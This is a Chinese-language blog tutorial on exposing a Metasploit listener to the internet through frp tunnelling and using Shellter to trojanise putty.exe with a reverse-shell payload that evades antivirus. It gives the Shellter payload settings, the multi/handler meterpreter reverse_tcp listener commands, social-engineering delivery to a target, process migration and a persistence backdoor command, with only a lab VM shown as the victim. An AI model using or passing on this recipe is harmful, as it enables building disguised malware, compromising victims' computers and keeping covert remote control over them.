利用frp搭建公网Metasploit并使用Shellter实现简单木马免杀

简介: 利用frp搭建公网Metasploit并使用Shellter实现简单木马免杀

最近看了freebuf上关于Metasploit的一些文章,再加上最近所学习到的Kali知识,尝试利用Frp搭建公网Metasploit并使用Shellter实现简单木马免杀的渗透攻击


简单的拓扑图如下


640.png


云主机CentOS7

640.jpg

内网Kali机

640.jpg

基础概念


1、Shellter 是一款动态 shellcode 注入工具,可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀2、Metasploit是一个免费的、可下载的渗透攻击框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台, 然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境3、Frp:一款国产优秀的内网穿透工具具体过程及步骤如下


1、下载putty.exe 32位版本并上传kali机器并安装Shellter


下载putty.exe32位,因为shellter只支持32位程序

640.png


640.png


apt install shellter
dpkg --add-architecture i386 && apt update && apt -y install wine32

640.png


2、使用Shellter生成远控木马


kali机器运行Shellter

640.png

640.png

640.png


Use a listed payload or custom? (L/C/H): L 使用攻击模块列表
Select payload by index: 1
SET LHOST: 81.X.X.X 设置接收反弹的公网IP
SET LPORT: 5432 设置接收反弹的端口

640.png

640.png



当然你也可以使用msfvenom生成exe木马


3、kali主机上安装frp内网穿透软件


将metasploit的内网监听端口5432映射到公网云主机的5432端口上 映射关系如下


  • metasploit反弹回连端口:内网192.168.31.57:5432<----------->公网81.X.X.X:5432
  • kali SSH端口:内网192.168.31.57:22<----------->公网81.X.X.X:8722


kali机器上配置frpc.ini



640.jpg

640.jpg


frp内网穿透这个我就不过多介绍配置过程了,可以参考之前的文章


腾讯云主机上部署FRP+Teamviewer穿透内网进行远程运维

Linux下内网穿透工具Frp的简单使用


4、内网kali打开msfconsole监听反弹shell


use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.57(kali控制机的内网IP)
set LPORT 5432(反弹连接的端口,必须和shellter工具生成木马时设置的端口一样)
run(开始监听)


640.jpg


5、靶机上线后进行渗透攻击


比如社工手段将木马程序传到靶机,一但靶机运行了该木马程序 msfconsole反弹shell就可以看到靶机上线,接下来就可以进行攻击渗透,控制靶机了


为了演示方便,我在win7虚拟机电脑运行捆绑好木马的软件putty.exe 这时MSF可以看到会话建立了,接下来就可以搞事情了

640.jpg

640.jpg

640.jpg


6、安装后门


1)、将木马切换到一个比较稳定的进程,防止捆绑软件关闭后木马随之关闭


run post/windows/manage/migrate


2)、安装后门


run persistence -X -i 40(多少秒发送一次连接) -p 5432(端口) -r 192.168.31.57(控制者IP)

640.jpg

相关文章
|
Linux 网络安全 开发工具
校外网络连接校园网内的linux服务器方法(使用frp实现内网穿透)
平常在校园里连接校内实验室的linux服务器可以直接使用ssh直接链接私有ip地址,一旦本地移动到了校园网外部(如:使用手机流量wifi,或着暑假回家使用家庭wifi)便无法在使用ssh连接校内的服务器。本文提供一个实现校外也能访问校内服务器的方法
4436 0
校外网络连接校园网内的linux服务器方法(使用frp实现内网穿透)
|
2月前
|
安全 JavaScript 前端开发
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
|
2月前
|
安全 JavaScript 前端开发
一个下载木马的网站
一个下载木马的网站
|
2月前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
移动开发 JavaScript 安全
记录一次社会工程学工具Seeker+ngrok
今天偶然刷bi站,刷到seeker结合ngrok进行社会工程学钓鱼的教程,下面话不多说,直接开始!
|
6月前
|
安全 Shell
2021Kali -- 木马免杀制作
2021Kali -- 木马免杀制作
104 1
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
533 0
Metasploit -- 攻击Metasploitable2靶机
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
数据安全/隐私保护 虚拟化
搭建OWASP靶机
OWASP靶机下载地址https://sourceforge.net/projects/owaspbwa/files/
844 0
搭建OWASP靶机